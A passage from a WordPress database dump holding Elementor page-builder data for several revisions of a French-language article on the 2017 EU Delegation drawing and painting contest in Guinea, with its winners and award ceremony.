Afrique'),(2515,662,'_yoast_wpseo_linkdex','42'),(2516,662,'_yoast_wpseo_content_score','30'),(2517,681,'_elementor_edit_mode','builder'),(2519,784,'_elementor_edit_mode','builder'),(2520,784,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ku0gpr4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2521,784,'_elementor_version','0.4'),(2522,784,'_elementor_css','a:3:{s:4:\"time\";i:1508928113;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2523,785,'_elementor_edit_mode','builder'),(2524,785,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fuklf8m\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2525,785,'_elementor_version','0.4'),(2526,785,'_elementor_css','a:3:{s:4:\"time\";i:1508928113;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2527,786,'_elementor_edit_mode','builder'),(2528,786,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8febmsc\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2529,786,'_elementor_version','0.4'),(2530,787,'_elementor_edit_mode','builder'),(2531,787,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8febmsc\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2532,787,'_elementor_version','0.4'),(2534,788,'_elementor_edit_mode','builder'),(2535,788,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2536,788,'_elementor_version','0.4'),(2537,788,'_elementor_css','a:3:{s:4:\"time\";i:1509498685;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2539,681,'_elementor_data','[{\"id\":\"mpzkfuw\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tcbzfde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"amfzqbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:<strong> \\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/strong> avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>\\u00c9pilogue du concours national de dessin et de peinture organis\\u00e9 par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne en Guin\\u00e9e. Ovations et sourires de satisfaction ont ponctu\\u00e9 la c\\u00e9r\\u00e9monie de remise des Prix organis\\u00e9e dans la salle des spectacles du Centre Culturel Franco-Guin\\u00e9en en pr\\u00e9sence de la majorit\\u00e9 des participants.<\\/p><p>La c\\u00e9r\\u00e9monie \\u00e9tait pr\\u00e9sid\\u00e9e par l\'Ambassadeur, Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gerardus Gielen, en pr\\u00e9sence de trois de ses homologues des Etats membres en Guin\\u00e9e: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.<\\/p><p>C\'est le pr\\u00e9sident du Jury, M. Ben Youssouf \\\"Oscar\\\" Barry qui a proc\\u00e9d\\u00e9 \\u00e0 la proclamation des r\\u00e9sultats apr\\u00e8s avoir rappel\\u00e9 les crit\\u00e8res d\'\\u00e9valuation d\\u00e9finis et appliqu\\u00e9s par les cinq membres du Jury, \\u00e0 savoir:\\u00a0<em>conformit\\u00e9 au th\\u00e8me, originalit\\u00e9 de l\'id\\u00e9e, cr\\u00e9ativit\\u00e9, comp\\u00e9tence technique, sensibilit\\u00e9 artistique<\\/em>.<\\/p><p>Les trois laur\\u00e9ats, sur 61 participants, sont les suivants:<\\/p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, s\\u00e9rigraphe, infographe. Outre un lot de gadgets offerts par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dot\\u00e9e d\'une application de dessin professionnel. Son \\u0153uvre est un dessin qui envisage le d\\u00e9veloppement de la Guin\\u00e9e par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la r\\u00e9paration du tissu social.<\\/li><\\/ul><ul><li>DEUXI\\u00c8ME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitu\\u00e9 d\'une tablette graphique\\u00a0<em>Intuos<\\/em>\\u00a0tactile \\u00e0 stylet pour dessins et cr\\u00e9ations professionnelles. Son \\u0153uvre dessin\\u00e9e repr\\u00e9sente une jeune femme \\u00e9panouie, cheveux dans le vent, se promenant dans une cit\\u00e9 guin\\u00e9enne moderne et ouverte au monde.<\\/li><\\/ul><ul><li>TROISI\\u00c8ME PRIX: BANGOURA Louis Isidore Katemb\\u00e8: 31 ans, r\\u00e9alisateur de formation, artiste polyvalent (musique, danse, th\\u00e9\\u00e2tre, peinture, dessin, bricolage\\u2026). Il gagne une mallette multifonctions pour dessinateurs\\/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagn\\u00e9 d\'un lot de gadgets estampill\\u00e9s \\\"Union europ\\u00e9enne\\\". L\'\\u0153uvre de M. Bangoura est une vision de la Guin\\u00e9e d\\u00e9velopp\\u00e9e \\u00e0 partir des ressources agricoles, \\u00e9nerg\\u00e9tiques, le transport, l\'\\u00e9ducation et la pr\\u00e9servation de l\'h\\u00e9ritage culturel traditionnel.<\\/li><\\/ul><p>Dans le groupe des 10 premiers, les sept autres participants ont \\u00e9t\\u00e9 distingu\\u00e9s \\u00e0 travers des prix d\'encouragement.<\\/p>\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-10\",\"bottom\":\"0\",\"left\":\"-4\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2542,789,'_elementor_edit_mode','builder'),(2543,789,'_elementor_css','a:4:{s:4:\"time\";i:1509491801;s:5:\"fonts\";a:0:{}s:6:\"status\";s:5:\"empty\";s:3:\"css\";s:0:\"\";}'),(2544,789,'_elementor_data','[{\"id\":\"mpzkfuw\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tcbzfde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"amfzqbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:<strong> \\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/strong> avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>\\u00c9pilogue du concours national de dessin et de peinture organis\\u00e9 par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne en Guin\\u00e9e. Ovations et sourires de satisfaction ont ponctu\\u00e9 la c\\u00e9r\\u00e9monie de remise des Prix organis\\u00e9e dans la salle des spectacles du Centre Culturel Franco-Guin\\u00e9en en pr\\u00e9sence de la majorit\\u00e9 des participants.<\\/p><p>La c\\u00e9r\\u00e9monie \\u00e9tait pr\\u00e9sid\\u00e9e par l\'Ambassadeur, Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gerardus Gielen, en pr\\u00e9sence de trois de ses homologues des Etats membres en Guin\\u00e9e: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.<\\/p><p>C\'est le pr\\u00e9sident du Jury, M. Ben Youssouf \\\"Oscar\\\" Barry qui a proc\\u00e9d\\u00e9 \\u00e0 la proclamation des r\\u00e9sultats apr\\u00e8s avoir rappel\\u00e9 les crit\\u00e8res d\'\\u00e9valuation d\\u00e9finis et appliqu\\u00e9s par les cinq membres du Jury, \\u00e0 savoir:\\u00a0<em>conformit\\u00e9 au th\\u00e8me, originalit\\u00e9 de l\'id\\u00e9e, cr\\u00e9ativit\\u00e9, comp\\u00e9tence technique, sensibilit\\u00e9 artistique<\\/em>.<\\/p><p>Les trois laur\\u00e9ats, sur 61 participants, sont les suivants:<\\/p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, s\\u00e9rigraphe, infographe. Outre un lot de gadgets offerts par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dot\\u00e9e d\'une application de dessin professionnel.<\\/li><\\/ul><ul><li>Son \\u0153uvre est un dessin qui envisage le d\\u00e9veloppement de la Guin\\u00e9e par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la r\\u00e9paration du tissu social.<\\/li><\\/ul><ul><li>DEUXI\\u00c8ME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitu\\u00e9 d\'une tablette graphique\\u00a0<em>Intuos<\\/em>\\u00a0tactile \\u00e0 stylet pour dessins et cr\\u00e9ations professionnelles.<\\/li><\\/ul><ul><li>Son \\u0153uvre dessin\\u00e9e repr\\u00e9sente une jeune femme \\u00e9panouie, cheveux dans le vent, se promenant dans une cit\\u00e9 guin\\u00e9enne moderne et ouverte au monde.<\\/li><\\/ul><ul><li>TROISI\\u00c8ME PRIX: BANGOURA Louis Isidore Katemb\\u00e8: 31 ans, r\\u00e9alisateur de formation, artiste polyvalent (musique, danse, th\\u00e9\\u00e2tre, peinture, dessin, bricolage\\u2026). Il gagne une mallette multifonctions pour dessinateurs\\/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagn\\u00e9 d\'un lot de gadgets estampill\\u00e9s \\\"Union europ\\u00e9enne\\\".<\\/li><\\/ul><ul><li>L\'\\u0153uvre de M. Bangoura est une vision de la Guin\\u00e9e d\\u00e9velopp\\u00e9e \\u00e0 partir des ressources agricoles, \\u00e9nerg\\u00e9tiques, le transport, l\'\\u00e9ducation et la pr\\u00e9servation de l\'h\\u00e9ritage culturel traditionnel.<\\/li><\\/ul><p>Dans le groupe des 10 premiers, les sept autres participants ont \\u00e9t\\u00e9 distingu\\u00e9s \\u00e0 travers des prix d\'encouragement; et tous les participants ont \\u00e9t\\u00e9 gratifi\\u00e9s de\\u00a0<em>goodies<\\/em>\\u00a0offerts par la D\\u00e9l\\u00e9gation.<\\/p><p>Les troph\\u00e9es et les Prix ont \\u00e9t\\u00e9 remis par les Ambassadeurs.<\\/p><p>Le Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gielen, a salu\\u00e9 et remerci\\u00e9 les concurrents, ses homologues pour leur pr\\u00e9sence ainsi que tous ceux qui ont permis la r\\u00e9ussite de l\'\\u00e9v\\u00e8nement et notamment le personnel du CCFG \\u00e0 travers son Directeur, M. Nicolas Doyard, qui a tenu \\u00e0 exprimer sa satisfaction d\'avoir pris part \\u00e0 l\'organisation du concours. Sans oublier l\'Institut Sup\\u00e9rieur d\'Arts de Dubr\\u00e9ka dont les \\u00e9tudiants ont massivement pris part au concours, ainsi que HAVAS Guin\\u00e9e partenaire de la D\\u00e9l\\u00e9gation pour diverses activit\\u00e9s.<\\/p><p>De leur c\\u00f4t\\u00e9, les trois laur\\u00e9ats ont pris la parole pour exprimer tour \\u00e0 tour leur satisfaction et leur fiert\\u00e9 de remporter ces prix.<\\/p><p><em>\\\"Tout est possible\\\"\\u00a0<\\/em>a soulign\\u00e9, Alpha Oumar Diallo (Premier Prix).\\u00a0<em>\\\"Malgr\\u00e9 mon handicap (<\\/em>Il bo\\u00eete d\'une jambe, NDLR<em>), je suis \\u00e0 mon troisi\\u00e8me Prix apr\\u00e8s avoir remport\\u00e9 deux autres dont celui du logo du 50<sup>\\u00e8me<\\/sup>\\u00a0anniversaire d\'Ind\\u00e9pendance de la Guin\\u00e9e\\\".<\\/em>\\u00a0M. Diallo invite les artistes \\u00e0 compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.<\\/p><p>La c\\u00e9r\\u00e9monie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les \\u0153uvres du concours pr\\u00e9sentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.<\\/p><p>A rappeler que ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:\\u00a0<strong><em>\\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/em><\\/strong>\\u00a0avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>La c\\u00e9r\\u00e9monie de remise des Prix et l\'exposition font partie d\'une s\\u00e9rie d\'activit\\u00e9s culturelles (cin\\u00e9ma, quiz radio, etc.) c\\u00e9l\\u00e9brant la Semaine de l\'Europe 2017 organis\\u00e9e par la D\\u00e9l\\u00e9gation et les Etats membres.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2545,681,'_elementor_version','0.4'),(2549,790,'_elementor_edit_mode','builder'),(2550,790,'_elementor_data','[{\"id\":\"mpzkfuw\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tcbzfde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"amfzqbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:<strong> \\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/strong> avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>\\u00c9pilogue du concours national de dessin et de peinture organis\\u00e9 par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne en Guin\\u00e9e. Ovations et sourires de satisfaction ont ponctu\\u00e9 la c\\u00e9r\\u00e9monie de remise des Prix organis\\u00e9e dans la salle des spectacles du Centre Culturel Franco-Guin\\u00e9en en pr\\u00e9sence de la majorit\\u00e9 des participants.<\\/p><p>La c\\u00e9r\\u00e9monie \\u00e9tait pr\\u00e9sid\\u00e9e par l\'Ambassadeur, Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gerardus Gielen, en pr\\u00e9sence de trois de ses homologues des Etats membres en Guin\\u00e9e: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.<\\/p><p>C\'est le pr\\u00e9sident du Jury, M. Ben Youssouf \\\"Oscar\\\" Barry qui a proc\\u00e9d\\u00e9 \\u00e0 la proclamation des r\\u00e9sultats apr\\u00e8s avoir rappel\\u00e9 les crit\\u00e8res d\'\\u00e9valuation d\\u00e9finis et appliqu\\u00e9s par les cinq membres du Jury, \\u00e0 savoir:\\u00a0<em>conformit\\u00e9 au th\\u00e8me, originalit\\u00e9 de l\'id\\u00e9e, cr\\u00e9ativit\\u00e9, comp\\u00e9tence technique, sensibilit\\u00e9 artistique<\\/em>.<\\/p><p>Les trois laur\\u00e9ats, sur 61 participants, sont les suivants:<\\/p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, s\\u00e9rigraphe, infographe. Outre un lot de gadgets offerts par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dot\\u00e9e d\'une application de dessin professionnel.<\\/li><\\/ul><ul><li>Son \\u0153uvre est un dessin qui envisage le d\\u00e9veloppement de la Guin\\u00e9e par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la r\\u00e9paration du tissu social.<\\/li><\\/ul><ul><li>DEUXI\\u00c8ME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitu\\u00e9 d\'une tablette graphique\\u00a0<em>Intuos<\\/em>\\u00a0tactile \\u00e0 stylet pour dessins et cr\\u00e9ations professionnelles.<\\/li><\\/ul><ul><li>Son \\u0153uvre dessin\\u00e9e repr\\u00e9sente une jeune femme \\u00e9panouie, cheveux dans le vent, se promenant dans une cit\\u00e9 guin\\u00e9enne moderne et ouverte au monde.<\\/li><\\/ul><ul><li>TROISI\\u00c8ME PRIX: BANGOURA Louis Isidore Katemb\\u00e8: 31 ans, r\\u00e9alisateur de formation, artiste polyvalent (musique, danse, th\\u00e9\\u00e2tre, peinture, dessin, bricolage\\u2026). Il gagne une mallette multifonctions pour dessinateurs\\/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagn\\u00e9 d\'un lot de gadgets estampill\\u00e9s \\\"Union europ\\u00e9enne\\\".<\\/li><\\/ul><ul><li>L\'\\u0153uvre de M. Bangoura est une vision de la Guin\\u00e9e d\\u00e9velopp\\u00e9e \\u00e0 partir des ressources agricoles, \\u00e9nerg\\u00e9tiques, le transport, l\'\\u00e9ducation et la pr\\u00e9servation de l\'h\\u00e9ritage culturel traditionnel.<\\/li><\\/ul><p>Dans le groupe des 10 premiers, les sept autres participants ont \\u00e9t\\u00e9 distingu\\u00e9s \\u00e0 travers des prix d\'encouragement; et tous les participants ont \\u00e9t\\u00e9 gratifi\\u00e9s de\\u00a0<em>goodies<\\/em>\\u00a0offerts par la D\\u00e9l\\u00e9gation.<\\/p><p>Les troph\\u00e9es et les Prix ont \\u00e9t\\u00e9 remis par les Ambassadeurs.<\\/p><p>Le Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gielen, a salu\\u00e9 et remerci\\u00e9 les concurrents, ses homologues pour leur pr\\u00e9sence ainsi que tous ceux qui ont permis la r\\u00e9ussite de l\'\\u00e9v\\u00e8nement et notamment le personnel du CCFG \\u00e0 travers son Directeur, M. Nicolas Doyard, qui a tenu \\u00e0 exprimer sa satisfaction d\'avoir pris part \\u00e0 l\'organisation du concours. Sans oublier l\'Institut Sup\\u00e9rieur d\'Arts de Dubr\\u00e9ka dont les \\u00e9tudiants ont massivement pris part au concours, ainsi que HAVAS Guin\\u00e9e partenaire de la D\\u00e9l\\u00e9gation pour diverses activit\\u00e9s.<\\/p><p>De leur c\\u00f4t\\u00e9, les trois laur\\u00e9ats ont pris la parole pour exprimer tour \\u00e0 tour leur satisfaction et leur fiert\\u00e9 de remporter ces prix.<\\/p><p><em>\\\"Tout est possible\\\"\\u00a0<\\/em>a soulign\\u00e9, Alpha Oumar Diallo (Premier Prix).\\u00a0<em>\\\"Malgr\\u00e9 mon handicap (<\\/em>Il bo\\u00eete d\'une jambe, NDLR<em>), je suis \\u00e0 mon troisi\\u00e8me Prix apr\\u00e8s avoir remport\\u00e9 deux autres dont celui du logo du 50<sup>\\u00e8me<\\/sup>\\u00a0anniversaire d\'Ind\\u00e9pendance de la Guin\\u00e9e\\\".<\\/em>\\u00a0M. Diallo invite les artistes \\u00e0 compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.<\\/p><p>La c\\u00e9r\\u00e9monie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les \\u0153uvres du concours pr\\u00e9sentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.<\\/p><p>A rappeler que ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:\\u00a0<strong><em>\\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/em><\\/strong>\\u00a0avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>La c\\u00e9r\\u00e9monie de remise des Prix et l\'exposition font partie d\'une s\\u00e9rie d\'activit\\u00e9s culturelles (cin\\u00e9ma, quiz radio, etc.) c\\u00e9l\\u00e9brant la Semaine de l\'Europe 2017 organis\\u00e9e par la D\\u00e9l\\u00e9gation et les Etats membres.<\\/p>\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-10\",\"bottom\":\"0\",\"left\":\"-4\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2551,790,'_elementor_version','0.4'),(2552,790,'_elementor_css','a:3:{s:4:\"time\";i:1509533575;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2560,791,'_elementor_edit_mode','builder'),(2561,791,'_elementor_data','[{\"id\":\"mpzkfuw\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tcbzfde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"amfzqbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ce Concours de dessin\\/ peinture a \\u00e9t\\u00e9 organis\\u00e9 du 15 f\\u00e9vrier au 15 mars 2017 par la D\\u00e9l\\u00e9gation. Il portait sur le th\\u00e8me:<strong> \\\"Culture et d\\u00e9veloppement: quelle vision pour la Guin\\u00e9e de demain\\\"<\\/strong> avec pour objectif de faire \\u00e9merger et promouvoir des talents artistiques guin\\u00e9ens en montrant que la cr\\u00e9ation artistique est un vecteur de d\\u00e9veloppement.<\\/p><p>\\u00c9pilogue du concours national de dessin et de peinture organis\\u00e9 par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne en Guin\\u00e9e. Ovations et sourires de satisfaction ont ponctu\\u00e9 la c\\u00e9r\\u00e9monie de remise des Prix organis\\u00e9e dans la salle des spectacles du Centre Culturel Franco-Guin\\u00e9en en pr\\u00e9sence de la majorit\\u00e9 des participants.<\\/p><p>La c\\u00e9r\\u00e9monie \\u00e9tait pr\\u00e9sid\\u00e9e par l\'Ambassadeur, Chef de la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, M. Gerardus Gielen, en pr\\u00e9sence de trois de ses homologues des Etats membres en Guin\\u00e9e: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.<\\/p><p>C\'est le pr\\u00e9sident du Jury, M. Ben Youssouf \\\"Oscar\\\" Barry qui a proc\\u00e9d\\u00e9 \\u00e0 la proclamation des r\\u00e9sultats apr\\u00e8s avoir rappel\\u00e9 les crit\\u00e8res d\'\\u00e9valuation d\\u00e9finis et appliqu\\u00e9s par les cinq membres du Jury, \\u00e0 savoir:\\u00a0<em>conformit\\u00e9 au th\\u00e8me, originalit\\u00e9 de l\'id\\u00e9e, cr\\u00e9ativit\\u00e9, comp\\u00e9tence technique, sensibilit\\u00e9 artistique<\\/em>.<\\/p><p>Les trois laur\\u00e9ats, sur 61 participants, sont les suivants:<\\/p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, s\\u00e9rigraphe, infographe. Outre un lot de gadgets offerts par la D\\u00e9l\\u00e9gation de l\'Union europ\\u00e9enne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dot\\u00e9e d\'une application de dessin professionnel. Son \\u0153uvre est un dessin qui envisage le d\\u00e9veloppement de la Guin\\u00e9e par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la r\\u00e9paration du tissu social.<\\/li><\\/ul><ul><li>DEUXI\\u00c8ME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitu\\u00e9 d\'une tablette graphique\\u00a0<em>Intuos<\\/em>\\u00a0tactile \\u00e0 stylet pour dessins et cr\\u00e9ations professionnelles. Son \\u0153uvre dessin\\u00e9e repr\\u00e9sente une jeune femme \\u00e9panouie, cheveux dans le vent, se promenant dans une cit\\u00e9 guin\\u00e9enne moderne et ouverte au monde.<\\/li><\\/ul><ul><li>TROISI\\u00c8ME PRIX: BANGOURA Louis Isidore Katemb\\u00e8: 31 ans, r\\u00e9alisateur de formation, artiste polyvalent (musique, danse, th\\u00e9\\u00e2tre, peinture, dessin, bricolage\\u2026). Il gagne une mallette multifonctions pour dessinateurs\\/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagn\\u00e9 d\'un lot de gadgets estampill\\u00e9s \\\"Union europ\\u00e9enne\\\". L\'\\u0153uvre de M. Bangoura est une vision de la Guin\\u00e9e d\\u00e9velopp\\u00e9e \\u00e0 partir des ressources agricoles, \\u00e9nerg\\u00e9tiques, le transport, l\'\\u00e9ducation et la pr\\u00e9servation de l\'h\\u00e9ritage culturel traditionnel.<\\/li><\\/ul><p>Dans le groupe des 10 premiers, les sept autres participants ont \\u00e9t\\u00e9 distingu\\u00e9s \\u00e0 travers des prix 